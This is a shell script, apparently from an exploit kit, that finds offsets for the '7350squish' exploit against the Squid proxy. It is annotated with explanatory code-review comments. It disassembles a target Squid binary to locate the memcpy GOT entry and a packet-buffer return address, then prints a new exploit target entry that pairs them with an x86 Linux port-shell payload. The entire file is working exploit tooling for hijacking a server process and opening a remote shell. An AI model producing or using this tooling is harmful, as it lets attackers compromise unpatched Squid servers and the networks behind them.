#!/bin/sh
# 7350squish offset finder
# lorian & scut
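#######################################
# Verify that each named program can be found on PATH.
# Arguments: one or more program names
# Outputs:   "checking for <name>: <path>" on stdout for each program;
#            "not found, aborting" for the first one that is missing
# Returns:   0 when every program is present; exits 1 on the first
#            missing one (the original bare 'exit' returned 0, so a
#            caller could not tell failure from success)
#######################################
check_util ()
{
  for util in "$@"; do
    # printf rather than 'echo -n': '-n' is not portable under #!/bin/sh
    printf '%s' "checking for $util: "
    # 'command -v' is the POSIX way to test for a command; 'which' is an
    # external program whose exit status differs between systems
    if ! command -v "$util"; then
      echo "not found, aborting"
      exit 1
    fi
  done
}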
echo "7350squish exploit offset finder"
echo
# Exactly one argument (the path to the binary) is required.
# Note: a bare 'exit' takes the status of the preceding echo, i.e. 0,
# so a usage error is not distinguishable from success by the caller.
if [ $# != 1 ]; then
echo "usage: $0 /path/to/squid/binary"
echo
exit
fi;
# Both tools below must be present; check_util (defined above) aborts otherwise.
check_util awk objdump
echo
# Disassemble the binary, keep the line following the first match of the
# byte sequence "68 00 02 00 00" plus one line of context, take the last of
# those lines and the text after its first '$'.  objdump errors are silenced,
# so an unreadable or missing file yields an empty $bufferbase with no warning.
# $1 is unquoted: a path containing whitespace would be split.
bufferbase=`objdump -D $1 2>/dev/null | \
grep "68 00 02 00 00" -A 1 | tail -1 | cut -d '$' -f2`
# hex2num: parse a "0x..." string by hand.  The loop runs i = 1 .. n-2 and
# reads substr(s, i+2, 1), i.e. characters 3..n, skipping the two-character
# prefix.  Letters a-f are mapped to 10-15; decimal digits are left as
# strings and coerced to numbers by awk in "v * 16 + c".
# The result has 144 (0x90) added and is printed as a zero-padded 8-digit
# hex value.  If $bufferbase is empty, hex2num("") returns 0.
retaddr=`echo $bufferbase | awk 'function hex2num(s)
{
n = length (s)
v = 0
for (i = 1; i < n-1; i++) {
c = tolower(substr (s, i+2, 1));
if (c=="a") c=10;
if (c=="b") c=11;
if (c=="c") c=12;
if (c=="d") c=13;
if (c=="e") c=14;
if (c=="f") c=15;
v = v * 16 + c;
}
return v
}
{
printf ("0x%08x\n", hex2num ($0) + 144)
}'`
# Earlier variant, kept commented out: relies on awk's own string-to-number
# conversion, which does not understand the "0x" prefix.
#retaddr=`echo $bufferbase | awk '{ printf ("0x%08x\n", $0 + 144) }'`
# Dynamic relocation entries: take the first field (the offset) of every
# line ending in "memcpy" and prefix it with "0x".  The awk printf has no
# newline, so several matching lines would be concatenated into one token;
# as above, errors are silenced and no emptiness check is made.
retloc=`objdump -R $1 2>/dev/null | \
grep "memcpy$" | awk '{ printf ("0x%s", $1) }'`
# Print the collected values as a C initializer fragment.
echo "{ \"NEW TARGET\","
echo "x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,"
echo "$retloc, /* GOT: memcpy */"
echo "$retaddr, /* packet receive buffer + 0x90 */"
echo "0x0182, 288 },"
echo
echo finished.